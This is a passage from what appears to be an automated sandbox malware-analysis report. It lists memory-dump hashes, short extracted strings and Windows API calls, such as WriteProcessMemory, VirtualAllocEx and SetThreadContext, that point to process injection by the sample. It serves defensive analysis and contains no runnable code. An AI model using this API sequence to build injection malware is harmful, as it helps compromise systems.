                                                                                    • Opcode Fuzzy Hash: 1fdfd519f798a8f2433aa4562ae14ac7d0688cec8cf52fc84c0ac450b0acf032
                                                                                    • Instruction Fuzzy Hash: 5E328CB1B006168FDB98DFA9C49466EFBF2FF88301F248569D55AD7385CB34A901CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528151913.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a20000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e8d650db4b5af1d271838d99c598f4685ca4c94bc2307feacdaaba3a7c877255
                                                                                    • Instruction ID: a233cf4dfd92b6337b4f6ce60e2071652c3c0a23c79f35db435c0279eaa56330
                                                                                    • Opcode Fuzzy Hash: e8d650db4b5af1d271838d99c598f4685ca4c94bc2307feacdaaba3a7c877255
                                                                                    • Instruction Fuzzy Hash: 08121770E45229CFEB64EF6AC844B9AB7B2FF89304F1081A6D409AB355DB709D81CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528151913.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a20000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c3c8e8394c45dcddd6c5a6ec68c0123a7723e2d4bda0dd6afefe70f0bf785845
                                                                                    • Instruction ID: 1468097b8549f75fcdb30b14a2991f5473df8453cf653cea7a5d401684cd89fb
                                                                                    • Opcode Fuzzy Hash: c3c8e8394c45dcddd6c5a6ec68c0123a7723e2d4bda0dd6afefe70f0bf785845
                                                                                    • Instruction Fuzzy Hash: 04120670E45229CFEB64EF6AD844B9AB7B2FF89304F1081A6D409AB355DB709D81CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528151913.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a20000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 190a9ca6220a282063ea18d4f89b555c825c80572a961a8ecb6ec194a9aceefa
                                                                                    • Instruction ID: cf61fb8f8130f4d7f65756dad6027e40a149829af53bd5e3b6c84637d22c69bf
                                                                                    • Opcode Fuzzy Hash: 190a9ca6220a282063ea18d4f89b555c825c80572a961a8ecb6ec194a9aceefa
                                                                                    • Instruction Fuzzy Hash: 9C120670E45229CFEB64EF69D884B9AB7B2FF89304F1081A6D409AB355DB709D81CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528151913.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a20000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d6c275f73d781446a205dd3032ef49430f73f47e1f6470b298fc40f7cb926df1
                                                                                    • Instruction ID: 49f4fcdae63e7d71fc83687336d7b2153759a38ebe060784f99e748d9ff28167
                                                                                    • Opcode Fuzzy Hash: d6c275f73d781446a205dd3032ef49430f73f47e1f6470b298fc40f7cb926df1
                                                                                    • Instruction Fuzzy Hash: 6E02E570E45229CFEB64EF69D884B9AB7B2FF89304F1081A6D409AB355DB709D81CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2527009473.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63c0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 10e656c0ea26a4eb49cc25f07778c991c0ca7466a486bdfdce2a729eb4632514
                                                                                    • Instruction ID: 09760343b674b6914cad4732acd9a660d4d6c0d6a5b8ed6168ceaa8967bb6a51
                                                                                    • Opcode Fuzzy Hash: 10e656c0ea26a4eb49cc25f07778c991c0ca7466a486bdfdce2a729eb4632514
                                                                                    • Instruction Fuzzy Hash: 99E13A70E04208CFEB54DFA9D845BADBBB2FF89314F108199E919AB295DB305D46CF81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526983156.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63b0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3ccdcd47af74f7f5df21299a0fa4b3f0018692263e1586bbc9cf1cbb1c4a0efa
                                                                                    • Instruction ID: 04234968f52d56023b94f62e8b73698b1c4acf4789ee4721ff98e81af9b5fce6
                                                                                    • Opcode Fuzzy Hash: 3ccdcd47af74f7f5df21299a0fa4b3f0018692263e1586bbc9cf1cbb1c4a0efa
                                                                                    • Instruction Fuzzy Hash: CED17D70E09218CFEB40DFA9D484BEEBBB5FF89304F1090AAD559AB655CB305945CF81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2527009473.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63c0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 171d918dc0ef0c1d445576371d0d4145f9e8bdff60b5ad960bc2e5dc4ca8f811
                                                                                    • Instruction ID: 5755370843549ea19a5701bd602f2786f590b9065c95081674ae6485f062d25e
                                                                                    • Opcode Fuzzy Hash: 171d918dc0ef0c1d445576371d0d4145f9e8bdff60b5ad960bc2e5dc4ca8f811
                                                                                    • Instruction Fuzzy Hash: 15C1F474E15208CFEB54CFAAD484B9EBBF6BF89324F109069E409AB255DB306C45CF90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2527009473.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63c0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 51eaffea36576bd3844b3ca9604ad5fb3a104d1c6ff9fd3c89ff5b6ff8b73d08
                                                                                    • Instruction ID: a4c73d148622f46bd378f7e47953ffb73f8edd9bc2c76af5f1adf4e2793a534b
                                                                                    • Opcode Fuzzy Hash: 51eaffea36576bd3844b3ca9604ad5fb3a104d1c6ff9fd3c89ff5b6ff8b73d08
                                                                                    • Instruction Fuzzy Hash: 39C10474E15208CFEB54CFAAD484B9EBBF6BF89324F109069E409AB255DB306C45CF90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bb83e7fdc0597ec4b8a88279934896d11fb7cdc35e4b18263264a5d26d7beb1d
                                                                                    • Instruction ID: 9139ef2ce3240197e499a77cf7a07061181341c18cc7bb81db4f43fb3a671333
                                                                                    • Opcode Fuzzy Hash: bb83e7fdc0597ec4b8a88279934896d11fb7cdc35e4b18263264a5d26d7beb1d
                                                                                    • Instruction Fuzzy Hash: 03B11B70E05228CFDB54DFA9D844B9DBBF2BF89300F1091A9F00AAB255DB745985CF41
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526983156.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63b0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 1$t
                                                                                    • API String ID: 0-2087191094

                                                                                    APIs
                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 063B0F0A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526983156.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63b0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 963392458-0

                                                                                    APIs
                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 063B0F0A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526983156.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63b0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 963392458-0

                                                                                    APIs
                                                                                    • CopyFileA.KERNEL32(?,?,?), ref: 063C6F0D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2527009473.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63c0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: CopyFile
                                                                                    • String ID:
                                                                                    • API String ID: 1304948518-0

                                                                                    APIs
                                                                                    • CopyFileA.KERNEL32(?,?,?), ref: 063C6F0D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2527009473.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63c0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: CopyFile
                                                                                    • String ID:
                                                                                    • API String ID: 1304948518-0

                                                                                    APIs
                                                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 063B2238
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526983156.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63b0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3559483778-0

                                                                                    APIs
                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 063B1576
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526983156.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63b0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContextThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 983334009-0

                                                                                    APIs
                                                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 063B2238
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526983156.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63b0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3559483778-0

                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00A5DC6E,?,?,?,?,?), ref: 00A5DD2F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2508680920.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_a50000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    APIs
                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 063B1576
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526983156.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63b0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContextThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 983334009-0
                                                                                    APIs
                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06B8DB5C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528730026.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6b80000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-0
                                                                                    APIs
                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06B8DB5C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528730026.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6b80000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-0
                                                                                    APIs
                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 063B1F7E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526983156.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63b0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528730026.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6b80000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    APIs
                                                                                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 06C4D8EC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528827060.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6c40000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528730026.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6b80000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    APIs
                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 063B1F7E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526983156.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63b0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00A5B61E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2508680920.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_a50000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(?,?,?,?), ref: 06C4E8CB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528827060.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6c40000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: XM[
                                                                                    • API String ID: 0-4036937546
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: C
                                                                                    • API String ID: 0-1037565863
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Q
                                                                                    • API String ID: 0-3463352047
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: i
                                                                                    • API String ID: 0-3865851505
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2529084026.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ea0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: f
                                                                                    • API String ID: 0-1993550816
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Q
                                                                                    • API String ID: 0-3463352047
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Q
                                                                                    • API String ID: 0-3463352047
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: i
                                                                                    • API String ID: 0-3865851505
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: w
                                                                                    • API String ID: 0-476252946
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528151913.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a20000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4d84351df61076c9e0f5738cea2f397f237c9fff4fb9e665be1da34065d37fe2
                                                                                    • Instruction ID: 840c3907d4b960bbad21a815ec00dae1d04f8053ba3436d6e5721ac08f11b009
                                                                                    • Opcode Fuzzy Hash: 4d84351df61076c9e0f5738cea2f397f237c9fff4fb9e665be1da34065d37fe2
                                                                                    • Instruction Fuzzy Hash: 60520B75A002288FDB64DF69C955BEDBBF2BF88300F1581D9E509AB351DA309E81CF61
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528025954.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_69f0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6263cfb647b8df56b28ea87968ce789207e8cf21dec5373ef230cd8c56bd4371
                                                                                    • Instruction ID: 6a5697c9c359247d78356d64ced0a1143c0edc2a2a0ca7e206363447c3429f22
                                                                                    • Opcode Fuzzy Hash: 6263cfb647b8df56b28ea87968ce789207e8cf21dec5373ef230cd8c56bd4371
                                                                                    • Instruction Fuzzy Hash: 3A422874E20209CFDB54DBE4C498BAEBBB2FB88341F518419DA52A7654C7749E82CF90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528151913.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a20000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8f3d8c3a6a55dd668c7ce75f554b827b1f980544ad0c7bbff142708576ebd7a8
                                                                                    • Instruction ID: f7010b0a3f137ea40e8db4d680387a012d6630bd7f617259eeeed3c7752a40e1
                                                                                    • Opcode Fuzzy Hash: 8f3d8c3a6a55dd668c7ce75f554b827b1f980544ad0c7bbff142708576ebd7a8
                                                                                    • Instruction Fuzzy Hash: A4229B71A40225DFDB44EFA9C594AADB7F2FF88300F158059E906AB3A5CB75ED40CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528151913.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a20000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: aac3d9e25ca8d93ff33c48d8bcc435c70a50db2c63964935ab86d7f78eca4e5e
                                                                                    • Instruction ID: 680e02024cde372b50c888a28e04c7c5ee492a6433b2b59143190d5b51b4006e
                                                                                    • Opcode Fuzzy Hash: aac3d9e25ca8d93ff33c48d8bcc435c70a50db2c63964935ab86d7f78eca4e5e
                                                                                    • Instruction Fuzzy Hash: 20227E71E4022ACFCB55EFA8D844AADBBB2FF88300F144015E911AB399DB75DE41CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528151913.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a20000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2ecc3f702582803db4da3faa3d2a4809235f7e10280f55a6b86fa0e74aa960d3
                                                                                    • Instruction ID: 7ccfb71c3b59654739098387ea7665fdb62b6c643ff775772d84332a3adedd70
                                                                                    • Opcode Fuzzy Hash: 2ecc3f702582803db4da3faa3d2a4809235f7e10280f55a6b86fa0e74aa960d3
                                                                                    • Instruction Fuzzy Hash: 31127B71A002158FCB65EFA9C984A6EB7F2FF88300F11852DE5069B355DB31EC46CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528151913.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a20000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d85c609346eb2af7ffa41872cb3f6b639a5de5036380d115548f29a7412ffedb
                                                                                    • Instruction ID: 49778116facf646dd5bb4d3ae384425bde1b55a46a224bf85e0f870473e51b20
                                                                                    • Opcode Fuzzy Hash: d85c609346eb2af7ffa41872cb3f6b639a5de5036380d115548f29a7412ffedb
                                                                                    • Instruction Fuzzy Hash: 37F1EA74A40219DFCB44EFA8D994E9DB7B2FF89310F118168E506AB365DB71EC42CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528025954.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_69f0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9a1196b32c30ea28a61b2eb73f13a62916ebd89acfec7ccda0cb7938ca4a5a08
                                                                                    • Instruction ID: b090d788ec7ce84f1a761ded65a64c1d2a95f573958da061c0481cb3e535b41d
                                                                                    • Opcode Fuzzy Hash: 9a1196b32c30ea28a61b2eb73f13a62916ebd89acfec7ccda0cb7938ca4a5a08
                                                                                    • Instruction Fuzzy Hash: 6FF11274D11218DFDBA8DFE5E4886ADBBB6FF89351F208429E516A7250CB309E81CF40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528151913.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a20000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
